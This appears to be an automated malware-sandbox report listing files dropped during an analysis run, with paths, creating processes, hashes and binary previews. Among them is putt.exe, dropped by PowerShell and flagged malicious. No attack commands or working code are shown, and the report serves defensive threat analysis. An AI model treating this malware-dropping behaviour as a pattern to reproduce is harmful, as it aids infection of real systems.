                                                                                                                                                                                                                                                                          SHA1:F058CB3583B851FB272B9B0768FCEE865F78E486
                                                                                                                                                                                                                                                                          SHA-256:638B1FA5EFB53EFA1EB2160A5DD443D8F12614F29EBF9C1B04C7B2E59BE23A63
                                                                                                                                                                                                                                                                          SHA-512:03B9A541DBE3010C62867949D5B42625662E2EB215CCAA369533F3F7F128B4E2E368F47F1B5DB4ED3FCFAF213147BFBFAD3512D84242DCC169DB5620058933CF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.3.t$D...,%M..\$8.\$@.\$..\$ .t$$.D$(..I..\$,.\$0.\$4.L$.8.0)M........}...+.tF...t+...t....uU.L$..d#...t$$.|$..B.L$..Q#...E....L$..C#...E..t$$.D$....5.)M..L$..'#...t$.3..D$$....F.D$.P.L$,.j....L$....0)M.A.L$.;...p....|$.Q.D$..\$.PQS.D$H.0$M.P.D$<Ph )M..e*....t.95,%M.t..=,%M.8\$.t<.L$8......L$(.D$(..I..)....t$,.p=..Y.L$.."...L$8.y"...../.L$(.D$(..I.......t$,.?=..Y.L$..Q"...L$8.H"..3._^[..]...U......<SV3.W.=,%M.F.|$.;........=g#M.........u.3.0$M...,%M.......L$..y....~....\$8.\$@.t$D.\$..\$ .t$$.D$(..I..\$,.\$0.\$49Y.~y....+.t=...t&...t....uF.L$..!...E..,.L$..!...E....L$..}!...E..t$$...L$..k!...E..D$$.....D$..D$.P.L$,....D$.G;x.|..|$.Q.D$..\$.PQS.D$H.0$M.P.D$<P.u..(....t795,%M.t/.|$D..=,%M.uU.L$8......D$@h.~L..0....YY..u6j.[..L$(.D$(..I..c....t$,.;..Y.L$.. ...L$8. .....E8\$.t..L$8.....M....L$(.D$(..I.......t$,.c;..Y.L$..u ...L$8.l ..3._^[..]...U..S.].V..W....K..C..F...tP...s.j.X3.F.j.Z.........Q..;..3..F.Y9~.v.j...:..Y.K.........J..H..N....G;~.r...3..~..~._..^[]...U

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Webster

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):129024
                                                                                                                                                                                                                                                                          Entropy (8bit):6.685566394532451
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:pAU4CE0Imbi80PtCZEMnVIPPBxT/sZydTmS:pAhClbfSCOMVIPPL/sZg
                                                                                                                                                                                                                                                                          MD5:1FA2AC3ECE7FD9A15C18981315729898
                                                                                                                                                                                                                                                                          SHA1:1477784CCA6FED096A2928C9DDDC38AB001905D1
                                                                                                                                                                                                                                                                          SHA-256:2EC359B827914240FD5094E64A16B4AC392C193BF1DA4D19395ED72779F91685
                                                                                                                                                                                                                                                                          SHA-512:2152DCB3F7004F1F78446D7AE0A65C6928C56E29DC474F80575FA7CCA450C546F3366539D97276B98FBBD0E4E6B04EB37FF1C167F32B797D78106C99B38EAAF1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:..I...t........F.;.r.............;.r.....0.I....M..._^3.[......]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E........3.........V..V..u......;.s+.........u..F..j.Zf.....f...E....;.......r......+.......j.P.........WPQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[.......]..U.............L.3.E..M........?k.0SV.....M.3.u.W.D...M..........E......^........^.;...............P...;.s!.........u.j.Zf.....f......M.;.r.SShU.........Q..P...+...P..PSh........I..u.........tLj.......+.QP........P..........I...t'............;.r..+E..F.;.....s.3..N.....0.I....M..._^3.[......].j.hh.L..c....u....u...... ........................;5.!M...............?k.0.M......M...D.(...tiV."...Y....}.e.......M..M..D.(.u...........r.... ....u..u.V.G.........}..E.............).u..}.V.x...Y..6.... ..A..........I............U...0...L.3.E..M..M.V.u.W.}..}..u.3........u.....!8......................S........?k.0.].....M..E.U.\.)...t....u(.....u..... ...............Q.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:@...e...........................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\6324ecbb-a1c2-4f1c-9260-fe50e646c796.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30xceyeq.gzk.ps1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcbdhf0s.ucl.psm1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iheqtwgn.rt3.psm1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhwyr0fw.5yc.ps1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_udwptoey.cut.psm1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgxcwwga.dgm.ps1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1658
                                                                                                                                                                                                                                                                          Entropy (8bit):5.409068946343501
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0+gF5J65JJ0+uW:JIVuwEw5MUFZLBQLtoVM
                                                                                                                                                                                                                                                                          MD5:279B55533EB1964024DBF78BA833BE4D
                                                                                                                                                                                                                                                                          SHA1:CAFD78B906A84A3A972B246E0D5F0D73FCAE84A9
                                                                                                                                                                                                                                                                          SHA-256:0C1976F70A7D74531E573E773BD586E1C873A667FB6D83AFE68F1BCE94CE6011
                                                                                                                                                                                                                                                                          SHA-512:EC0D29FA6F8A0936C97338115462CD31A187A821A7DAEA9651A6D1F9BC6D2580099DB434B1CA7B45BC65F5C484708BD6CB3C0E517BABBF18A14424B0CCD5B7C8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\d4af4d92-d90b-4d1f-bba6-67d784e85d7f.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\d8e1aece-ac20-41dc-b145-4e6bdd6d5b64.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):31335
                                                                                                                                                                                                                                                                          Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                          MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                          SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                          SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                          SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\putt.exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1273852
                                                                                                                                                                                                                                                                          Entropy (8bit):7.963622315465213
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:iSw7GQaYEXaOrP0awJKdb0QmZoEOWlx7uloMwppPETOJ4gD5zWs00:87/cXdsjJ4b0QAjOS7SoMwptK64gDgd0
                                                                                                                                                                                                                                                                          MD5:5782BEA403267E4A6DDF82263332ED59
                                                                                                                                                                                                                                                                          SHA1:2C1967ED35F79CE390EE56F30FDFA6D97426C4C9
                                                                                                                                                                                                                                                                          SHA-256:0F9003739FC0213FF837F03F9C1CE4C835E3AAB255C94D388AEFB9D9B985CB2D
                                                                                                                                                                                                                                                                          SHA-512:C52F301175E70162EF230F9BEF37C587C1168B8A79048583F65B52A5B35075DFA6569C5C6A0729A2B489D4D92E62B11BB0B0BD3C9DBCE22C00CB1327F06AE5E6
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: script.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.................................H.....@.................................@.......................G..`(...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc..............................@..@.reloc...............D..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\6324ecbb-a1c2-4f1c-9260-fe50e646c796.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1976
                                                                                                                                                                                                                                                                          Entropy (8bit):4.000452074411758
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Y+T1ZUq9UOCtCsd2Eb0bT1pCXoqZLS8UTR:X1d9UOCtR2Eb0vTKxLs
                                                                                                                                                                                                                                                                          MD5:83E0E58D0752FF7C3F888E6406413B84
                                                                                                                                                                                                                                                                          SHA1:14A8981E4355301BB3073DB6D7FFB337EF8482E3
                                                                                                                                                                                                                                                                          SHA-256:64E01BC292BA2EA1699576FCC445367047520EE895E290CCEE20C24C9336D8EF
                                                                                                                                                                                                                                                                          SHA-512:FC772BD3D6AC64110562AACA7D320F49FFBA4E1F9AC2E10456FCB75E172D086D3CE8996CFC64B33B2ECDF4F6B96E38905E671C1E6BA5205FEDE9AF4A183812C4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u12a0\u12f2\u1235 \u134d\u1320\u122d"},"explanationofflinedisabled":{"message":"\u12a8\u1218\u1235\u1218\u122d \u12cd\u132d \u1290\u12ce\u1275\u1362 Google \u1230\u1290\u12f6\u127d\u1295 \u12eb\u1208\u1260\u12ed\u1290\u1218\u1228\u1265 \u130d\u1295\u1299\u1290\u1275 \u1208\u1218\u1320\u1240\u121d \u1260Google \u1230\u1290\u12f6\u127d \u1218\u1290\u123b \u1308\u1345 \u120b\u12ed \u12c8\u12f0 \u1245\u1295\u1265\u122e\u127d \u12ed\u1202\u12f1\u1293 \u12a8\u1260\u12ed\u1290\u1218\u1228\u1261 \u130b\u122d \u1260\u121a\u1308\u1293\u1299\u1260\u1275 \u1240\u1323\u12e9 \u130a\u12dc \u120b\u12ed \u12e8\u1218\u1235\u1218\u122d \u12cd\u132d \u1235\u121d\u1228\u1275\u1295 \u12eb\u1265\u1229\u1362"},"explanationofflineenabled":{"message":"\u12a8\u1218\u1235\u1218\u122d \u12cd\u132d \u1290\u12ce\u1275\u1363 \u1290\u1308\u122d \u130d\u1295 \u12a0\u1201\u1295\u121d \u12e8\u121a\u1308\u1299 \u134b\u12ed\u120e\u127d\u1295 \u121b\u122d\u1275\u12d5 \u12c8\u12ed\u121d \u12a0\u12f2

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                          Download File
